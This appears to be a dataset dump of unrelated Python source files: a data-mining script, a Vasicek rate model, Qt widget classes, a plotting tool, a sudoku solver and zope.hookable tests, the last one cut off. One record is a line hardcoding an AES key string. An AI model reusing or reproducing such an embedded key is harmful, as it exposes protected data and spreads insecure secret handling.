index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
7,900 | 3b61d389eda85ddb4c96f93c977a33b91da579ce | import numpy as np
import pandas as pd
INPUT_FILE = 'data_full.csv'
data = pd.read_csv(INPUT_FILE)
data['date'] = pd.to_datetime(data['date'], format='%d-%m-%Y %H:%M:%S')
# Wyodrębnienie użytkowników i stron na jakie wchodzili do postaci <USER> [<SITES>]
data = data[['ip', 'address']]
data['sites'] = data.groupby(['ip']).transform(lambda x: ','.join(x))
data = data[['ip', 'sites']]
data['sites'] = data['sites'].apply(lambda x: x.split(','))
data.drop_duplicates(subset='ip', inplace=True, keep='first')
data.reset_index(drop=True, inplace=True)
# Analiza koszykowa
INPUT_FILE_MOST_POPULAR_SITES = 'percent_of_occurrences.csv'
sites = np.array(pd.read_csv(INPUT_FILE_MOST_POPULAR_SITES, usecols=[0]).values.tolist()).flatten()
cols = ['userID']
cols.extend(sites)
attributes = pd.DataFrame(columns=cols)
attributes['userID'] = data.ip
attributes.set_index('userID', inplace=True)
# Transformacja koszykowa
for col in cols:
if col == 'userID':
continue
attributes[col] = 0
len_sites = len(sites)
for i, row in data.iterrows():
vp = row.sites
for site in vp:
if site in sites:
attributes.iloc[i][site] = 1
attributes.to_csv('user_attributes.arff', header=False)
header = '@RELATION user_attributes.arff\n\n' + \
'@ATTRIBUTE userID STRING\n'
for site in sites:
header += '@ATTRIBUTE ' + site + ' {0, 1}\n'
header += '\n\n@DATA\n'
with open('user_attributes.arff', 'r+') as f:
content = f.read()
f.seek(0, 0)
f.write(header.rstrip('\r') + '\n' + content)
|
7,901 | 7112348631bc60767bfb79c7f6966fc9189c522b | aes_key = 'eR5ceExL4IpUUY2lqALN7gLXzo11jlXPOwTwFGwOO3h='
|
7,902 | b6470ffda9040223951a99abc600ce1e99fe146b | from functions2 import *
import numpy as np
#from functions import TermStructure,load_data
import numpy as np
import math
from scipy import optimize
import pylab as pl
from IPython import display as dp
class Vasicek():
def __init__(self,rs,vol):
self.t = rs.columns
self.ps= rs[-1:]
self.sigma = vol
def get_TheoreticalP(self,x=0):
sigma = self.sigma
try:
_ = x.shape
except:
x = self.t
a = self.a
b = self.b
B = (1-np.exp(-a*x))/a
A = np.exp(((B-x)*(a**2*b-(sigma**2)/2))/a**2-(sigma**2*B**2)/(4*a))
self.B=B
self.A=A
self.sim_p = A*np.exp(-B*x)
self.r = -1*np.log(self.sim_p)/x
return self.r
def loss(self,x):
self.a = x[0]
self.b = x[1]
self.sim_rs = apply(self.get_TheoreticalP,self.ps)
loss = np.array(self.ps.as_matrix())-np.array(self.sim_rs)
loss = 10000*np.sum(loss**2)
return loss
def solve(self,x0=np.random.rand(2)):
self.opt_results = optimize.fmin(self.loss,x0=x0)#,tol=1e-10,method='Nelder-Mead',options={'maxiter':1800})
self.a = self.opt_results[0]
self.b = self.opt_results[1]
print(self.opt_results)
def get_price_rate(self,T,r):
sigma = list(self.sigma)[T]
T = self.t[T]
a = self.a
b = self.b
B = (1-np.exp(-a*T))/a
A = np.exp(((B-T)*(a**2*b-(sigma**2)/2))/a**2)-(sigma**2*B**2)/(4*a)
p = A*np.exp(-B*r)
r = -1*np.log(p)/T
return p,r
def option_pricing(V,r,t,T,X):
#print('Expiration: {}'.format(t))
#print('Maturity: {}'.format(T))
time_dict = dict(zip(V.t,np.arange(len(V.t))))
r = r[-1:][t].item()
P = V.get_price_rate(time_dict[T],r)
p = V.get_price_rate(time_dict[t],r)
sigmap = V.sigma[t]*(1/V.a)*(1/np.sqrt(t))*(1-np.exp(-V.a*(T-t)))*np.sqrt((1-np.exp(-2*V.a*t))/(2*V.a))
d = (1/sigmap)*np.log(P[0]/(p[0]*X))+0.5*sigmap
c = P[0]*norm.cdf(d)-X*p[0]*norm.cdf(d-sigmap)
return c |
7,903 | ab79e2f9584dbbb526c62bde882a1bc9874b56f9 | from threading import Thread, Lock
from utils import reloj
import random
class Imprimidor(Thread):
def __init__(self, nombre, berlin, bolsa_dinero):
super().__init__()
pass
def run(self):
'''
Funcionalidad de iMPRIMIDOR que imprime dinero cada 5 minutos, cada
iteracion chequea si se cumple que hay problema con el dinero (20%)
'''
pass
def imprimir_dinero(self, dinero):
'''
Llamar a este método para imprimir dinero.
***Acá debes procurarte de evitar errores de concurrencia***
:param dinero:
:return:
'''
pass
def problema_papel(self):
'''
Probabilidad de problema con el papel de 20%
'''
pass
|
7,904 | 023dc23a5e649c2fbbb45ff577dffa3b5d2aac64 | import weakref
from Qt import QtCore
from Qt import QtGui
from Qt.QtWidgets import QDoubleSpinBox
from Qt.QtWidgets import QSpinBox
from Qt.QtWidgets import QWidget
from Qt.QtWidgets import QSpacerItem
from Qt.QtWidgets import QPushButton
from Qt.QtWidgets import QComboBox
from Qt.QtWidgets import QLineEdit
from Qt.QtWidgets import QCheckBox
from Qt.QtWidgets import QGraphicsProxyWidget
from Qt.QtWidgets import QGridLayout
from Qt.QtWidgets import QHBoxLayout
from Qt.QtWidgets import QSizePolicy
from AGraphCommon import *
from AbstractGraph import PinBase
from ..Ui import FloatVector3InputWidget_ui
from ..Ui import FloatVector4InputWidget_ui
from ..Ui import Matrix33InputWidget_ui
from ..Ui import Matrix44InputWidget_ui
import pyrr
def _configDoubleSpinBox(sb):
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def _configIntSpinBox(sb):
sb.setRange(INT_RANGE_MIN, INT_RANGE_MAX)
class InputWidgetRaw(QWidget):
"""
This type of widget can be used as a base class for complex ui generated by designer
"""
def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
super(InputWidgetRaw, self).__init__(parent=parent, **kwds)
self._defaultValue = defaultValue
# fuction with signature void(object)
# this will set data to pin
self.dataSetCallback = dataSetCallback
def onResetValue(self):
self.setWidgetValue(self._defaultValue)
def setWidgetValue(self, value):
'''to widget'''
pass
def widgetValueUpdated(self, value):
'''from widget'''
pass
class InputWidgetSingle(InputWidgetRaw):
"""
This type of widget is used for a simple widgets like buttons, checkboxes etc.
It consists of horizontal layout widget itself and reset button.
"""
def __init__(self, parent=None, dataSetCallback=None, defaultValue=None, userStructClass=None, **kwds):
super(InputWidgetSingle, self).__init__(parent=parent, dataSetCallback=dataSetCallback, defaultValue=defaultValue, userStructClass=userStructClass, **kwds)
# from widget
self.bWidgetSet = False
self.gridLayout = QGridLayout(self)
self.gridLayout.setSpacing(1)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem = QSpacerItem(40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.pbReset = QPushButton(self)
self.pbReset.setMaximumSize(QtCore.QSize(25, 25))
self.pbReset.setText("")
self.pbReset.setObjectName("pbReset")
self.pbReset.setIcon(QtGui.QIcon(":/icons/resources/reset.png"))
self.horizontalLayout.addWidget(self.pbReset)
self.pbReset.clicked.connect(self.onResetValue)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self._index = 0
def setWidget(self, widget):
self.horizontalLayout.insertWidget(self._index, widget)
class ExecInputWidget(InputWidgetSingle):
"""docstring for ExecInputWidget"""
def __init__(self, parent=None, **kwds):
super(ExecInputWidget, self).__init__(parent=parent, **kwds)
self.pb = QPushButton('execute', self)
self.setWidget(self.pb)
self.pb.clicked.connect(self.dataSetCallback)
self.pbReset.deleteLater()
def setObjectName(self,name):
super(ExecInputWidget, self).setObjectName(name)
self.pb.setText(name.split(".")[-1])
class EnumInputWidget(InputWidgetSingle):
"""
Enum input widget
"""
def __init__(self, parent=None, **kwds):
super(EnumInputWidget, self).__init__(parent=parent, **kwds)
# self._userStruct = kwds['userStructClass']
self.cb = QComboBox(self)
self.setWidget(self.cb)
for i in list(kwds['userStructClass']):
self.cb.addItem(i.name, i.value)
self.cb.currentIndexChanged[int].connect(self.dataSetCallback)
def setWidgetValue(self, val):
self.cb.setCurrentIndex(val)
class FloatInputWidget(InputWidgetSingle):
"""
Floating point data input widget
"""
def __init__(self, parent=None, **kwds):
super(FloatInputWidget, self).__init__(parent=parent, **kwds)
self.sb = QDoubleSpinBox(self)
_configDoubleSpinBox(self.sb)
self.setWidget(self.sb)
# when spin box updated call setter function
self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.sb.setValue(float(val))
class IntInputWidget(InputWidgetSingle):
"""
Decimal number input widget
"""
def __init__(self, parent=None, **kwds):
super(IntInputWidget, self).__init__(parent=parent, **kwds)
self.sb = QSpinBox(self)
_configIntSpinBox(self.sb)
self.setWidget(self.sb)
self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.sb.setValue(int(val))
class NoneInputWidget(InputWidgetSingle):
"""
String data input widget
"""
def __init__(self, parent=None, **kwds):
super(NoneInputWidget, self).__init__(parent=parent, **kwds)
self.le = QLineEdit(self)
self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.setWidget(self.le)
self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
self.le.setEnabled(False)
def setWidgetValue(self, val):
self.le.setText(str(val))
class StringInputWidget(InputWidgetSingle):
"""
String data input widget
"""
def __init__(self, parent=None, **kwds):
super(StringInputWidget, self).__init__(parent=parent, **kwds)
self.le = QLineEdit(self)
self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.setWidget(self.le)
self.le.textChanged.connect(lambda val: self.dataSetCallback(val))
def setWidgetValue(self, val):
self.le.setText(str(val))
class BoolInputWidget(InputWidgetSingle):
"""Boolean data input widget"""
def __init__(self, parent=None, **kwds):
super(BoolInputWidget, self).__init__(parent=parent, **kwds)
self.cb = QCheckBox(self)
self.setWidget(self.cb)
self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(val)))
def setWidgetValue(self, val):
if bool(val):
self.cb.setCheckState(QtCore.Qt.Checked)
else:
self.cb.setCheckState(QtCore.Qt.Unchecked)
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.Ui_Form):
"""Vector3 data input widget"""
def __init__(self, **kwds):
super(FloatVector3InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value()])
def _configSpinBoxes(self):
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.Ui_Form):
"""Vector4 data input widget"""
def __init__(self, **kwds):
super(FloatVector4InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.dsbW.valueChanged.connect(self._onDataChangedW)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])
def _configSpinBoxes(self):
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbW.setDecimals(FLOAT_DECIMALS)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def _onDataChangedW(self, val):
v = self.asDataTypeClass()
v.w = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
"""Quaternion data input widget"""
def __init__(self, **kwds):
super(QuatInputWidget, self).__init__(**kwds)
def asDataTypeClass(self):
return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
"""Matrix33 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix33([
[self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value()],
[self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value()]
])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13,
self.dsbm21, self.dsbm22, self.dsbm23,
self.dsbm31, self.dsbm32, self.dsbm33]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
"""Matrix44 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm14.valueChanged.connect(self.m14Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm24.valueChanged.connect(self.m24Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.dsbm34.valueChanged.connect(self.m34Changed)
self.dsbm41.valueChanged.connect(self.m41Changed)
self.dsbm42.valueChanged.connect(self.m42Changed)
self.dsbm43.valueChanged.connect(self.m43Changed)
self.dsbm44.valueChanged.connect(self.m44Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix44([
[self.dsbm11.value(), self.dsbm12.value(), self.dsbm13.value(), self.dsbm14.value()],
[self.dsbm21.value(), self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(), self.dsbm34.value()],
[self.dsbm41.value(), self.dsbm42.value(), self.dsbm43.value(), self.dsbm44.value()]
])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14,
self.dsbm21, self.dsbm22, self.dsbm23, self.dsbm24,
self.dsbm31, self.dsbm32, self.dsbm33, self.dsbm34,
self.dsbm41, self.dsbm42, self.dsbm43, self.dsbm44]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m14Changed(self, val):
m = self.asDataTypeClass()
m.m14 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m24Changed(self, val):
m = self.asDataTypeClass()
m.m24 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def m34Changed(self, val):
m = self.asDataTypeClass()
m.m34 = val
self.dataSetCallback(m)
def m41Changed(self, val):
m = self.asDataTypeClass()
m.m41 = val
self.dataSetCallback(m)
def m42Changed(self, val):
m = self.asDataTypeClass()
m.m42 = val
self.dataSetCallback(m)
def m43Changed(self, val):
m = self.asDataTypeClass()
m.m43 = val
self.dataSetCallback(m)
def m44Changed(self, val):
m = self.asDataTypeClass()
m.m44 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm14.setValue(val.m14)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm24.setValue(val.m24)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
self.dsbm34.setValue(val.m34)
self.dsbm41.setValue(val.m41)
self.dsbm42.setValue(val.m42)
self.dsbm43.setValue(val.m43)
self.dsbm44.setValue(val.m44)
def getInputWidget(dataType, dataSetter, defaultValue, userStructClass):
'''
factory method
'''
if dataType == DataTypes.Float:
return FloatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Int:
return IntInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.String:
return StringInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Bool:
return BoolInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.FloatVector3:
return FloatVector3InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.FloatVector4:
return FloatVector4InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Quaternion:
return QuatInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Matrix33:
return Matrix33InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Matrix44:
return Matrix44InputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
if dataType == DataTypes.Exec:
return ExecInputWidget(dataSetCallback=dataSetter, defaultValue=None)
if dataType == DataTypes.Enum:
return EnumInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue, userStructClass=userStructClass)
return NoneInputWidget(dataSetCallback=dataSetter, defaultValue=defaultValue)
|
7,905 | 9fdcaf65f070b7081afd327442dd20e3284c71eb | #!/usr/bin/env python
"""This script draws a boxplot of each atom contribution to the cavity."""
import sys
if sys.version < "2.7":
print >> sys.stderr, "ERROR: This script requires Python 2.7.x. "\
"Please install it and try again."
exit(1)
try:
import matplotlib.pyplot as pyplot
import numpy
except ImportError:
print >> sys.stderr, "ERROR:",
print >> sys.stderr, "This script requires matplotlib and numpy. "\
"Please make sure you installed it and that "\
"your PYTHONPATH is set adequately."
exit(1)
def parse_args():
import argparse
import os.path
def isfile(path):
Error = argparse.ArgumentTypeError
if not os.path.exists(path):
raise Error("No such file: '{0}'".format(path))
elif not os.path.isfile(path):
raise Error("Not a valid file: '{0}'".format(path))
return path
hf = lambda prog: argparse.HelpFormatter(prog, max_help_position=50)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=hf)
parser.add_argument("filename", type=isfile,
help="contribution data file")
parser.add_argument("-o", "--output",
help="output file name")
parser.add_argument("-n", type=int, default=0,
help="show n greatest contributions")
parser.add_argument("-s", "--stdev", action="store_true",
help="only plot standard deviations")
parser.add_argument("-r", metavar="residue", nargs="+",
help="plot specific residues along time")
return parser.parse_args()
def die(s):
print >> sys.stderr, "ERROR:", s
exit(1)
def show_usage():
print >> sys.stderr, "usage: python " + sys.argv[0] + " <filename.dat>"
def read_contrib(fname):
data = []
with open(fname, "rt") as f:
for line in f:
split = line.split()
k = split[0]
counts = [int(c) for c in split[2:]]
data.append((k, counts))
return data
def med(x):
x = sorted(x)
length = len(x)
if not length % 2:
return (x[length / 2] + x[(length - 1) / 2]) / 2.0
return float(x[length / 2])
def plot_sd(data):
x = numpy.array([i+1 for i in range(len(data[0]))])
d = numpy.std(data[1], axis=1)
pyplot.bar(x, d)
pyplot.xticks(x+.5, data[0], rotation=90)
ylim = pyplot.ylim()
pyplot.ylim((ylim[0]-10, ylim[1]+10))
pyplot.xlim((x[0]-1, x[-1]+1))
pyplot.subplots_adjust(left=0.1, right=0.9, top=0.95, bottom=0.2)
pyplot.title("Residue contribution standard deviations")
def plot_barplot(data):
x = [i+1 for i in range(len(data[0]))]
pyplot.boxplot(data[1])
pyplot.xticks(x, data[0], rotation=90)
ylim = pyplot.ylim()
pyplot.ylim((ylim[0]-10, ylim[1]+10))
pyplot.subplots_adjust(left=0.1, right=0.9, top=0.95, bottom=0.2)
pyplot.title("Residue contribution")
def plot_residues(data, residues):
def running_average(x, N):
return numpy.convolve(x, numpy.ones((N,))/N)[(N-1):]
if "all" in residues:
residues = data[0]
for r in residues:
try:
i = data[0].index(r)
except:
die("No residue named '{0}'".format(r))
# y = running_average(data[1][i], 5)
y = data[1][i]
pyplot.plot(y, label=r)
pyplot.legend(loc="best")
def main():
args = parse_args()
data = read_contrib(args.filename)
if args.n:
data = sorted(data, key=lambda x: med(x[1]), reverse=True)
data = data[:args.n]
data = zip(*data)
if args.r:
plot_residues(data, args.r)
elif args.stdev:
plot_sd(data)
else:
plot_barplot(data)
if args.output:
pyplot.savefig(args.output)
else:
pyplot.show()
if __name__ == '__main__':
main()
|
7,906 | 67452f31a49f50cdb2555406287b31e53a994224 | #!/usr/local/bin/python3
def printGrid(grid):
for row in grid:
print(row)
print("")
def validFormatting(grid):
if (type(grid) is not list):
return False
elif (len(grid) != 9):
return False
else:
for row in grid:
if (type(row) is not list):
return False
elif (len(row) != 9):
return False
else:
for item in row:
if (type(item) is not int or item < 0 or item > 9):
return False
return True
def validRows(grid):
found_zero = False
for row in range(9):
bit_dict = {}
for col in range(9):
current_item = grid[row][col]
if (current_item != 0 and current_item in bit_dict):
#print("{0} was duplicated in row {1}".format(current_item, row))
return False
else:
bit_dict[current_item] = True
return True
def validCols(grid):
found_zero = False
for col in range(9):
bit_dict = {}
for row in range(len(grid)):
current_item = grid[row][col]
if (current_item != 0 and current_item in bit_dict):
#print("{0} was duplicated in column {1}".format(current_item, row))
return False
else:
bit_dict[current_item] = True
return True
def validBoxes(grid):
start_positions = [[0,0],
[0,3],
[0,6],
[3,0],
[3,3],
[3,6],
[6,0],
[6,3],
[6,6]]
for i in range(9):
x = start_positions[i][0]
y = start_positions[i][1]
bit_dict = {}
for row in range(3):
for col in range(3):
current_item = grid[y+row][x+col]
if (current_item != 0 and current_item in bit_dict):
#print("{0} was duplicated in box ({1},{2})".format(current_item, x//3, y//3))
return False
else:
bit_dict[current_item] = True
return True
def getOpenSpot(grid):
for row in range(9):
for col in range(9):
if (grid[row][col] == 0):
return (row,col)
return None
def checkInRow(grid, row, num):
for col in range(9):
if (grid[row][col] == num):
return True
return False
def checkInCol(grid, col, num):
for row in range(9):
if (grid[row][col] == num):
return True
return False
def checkInBox(grid, startRow, startCol, num):
for row in range(3):
for col in range(3):
if (grid[startRow+row][startCol+col] == num):
return True
return False
def checkIsOkay(grid, row, col, val):
inRow = checkInRow(grid, row, val)
inCol = checkInCol(grid, col, val)
inBox = checkInBox(grid, row - (row%3), col - (col%3), val)
if (not inRow and not inCol and not inBox):
return True
else:
return False
def validGrid(grid):
if (not validFormatting(grid)):
return None
elif (
validRows(grid) and
validCols(grid) and
validBoxes(grid)
):
return True
else:
return False
def solveSudoku(grid):
nextSpot = getOpenSpot(grid)
if (nextSpot == None):
return True
row = nextSpot[0]
col = nextSpot[1]
for digit in range(1,10):
if (checkIsOkay(grid, row, col, digit)):
#print("Selected:", digit)
grid[row][col] = digit
#printGrid(grid)
if (solveSudoku(grid)):
return True
else:
grid[row][col] = 0
return False
|
7,907 | 13c0af340c4fff815919d7cbb1cfd3116be13771 | ##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test the hookable support Extension
"""
import unittest
def return_foo():
return 'FOO'
def return_bar():
return 'BAR'
def not_called():
raise AssertionError("This should not be called")
class PyHookableMixin:
def _callFUT(self, *args, **kw):
from zope.hookable import _py_hookable
return _py_hookable(*args, **kw)
class HookableMixin:
def _callFUT(self, *args, **kw):
from zope.hookable import _py_hookable
from zope.hookable import hookable
if hookable is _py_hookable:
raise unittest.SkipTest("Hookable and PyHookable are the same")
return hookable(*args, **kw) # pragma: no cover
class PyHookableTests(PyHookableMixin,
unittest.TestCase):
def test_pure_python(self):
from zope.hookable import _PURE_PYTHON
from zope.hookable import _c_hookable
from zope.hookable import _py_hookable
from zope.hookable import hookable
self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)
def test_before_hook(self):
hooked = self._callFUT(return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_after_hook(self):
hooked = self._callFUT(not_called)
old = hooked.sethook(return_bar)
self.assertIs(old, not_called)
self.assertIs(hooked.original, not_called)
self.assertIs(hooked.implementation, return_bar)
self.assertEqual(hooked(), 'BAR')
def test_after_hook_and_reset(self):
hooked = self._callFUT(return_foo)
old = hooked.sethook(not_called)
hooked.reset()
self.assertIs(old, return_foo)
self.assertIs(hooked.original, return_foo)
self.assertIs(hooked.implementation, return_foo)
self.assertEqual(hooked(), 'FOO')
def test_original_cannot_be_deleted(self):
hooked = self._callFUT(not_called)
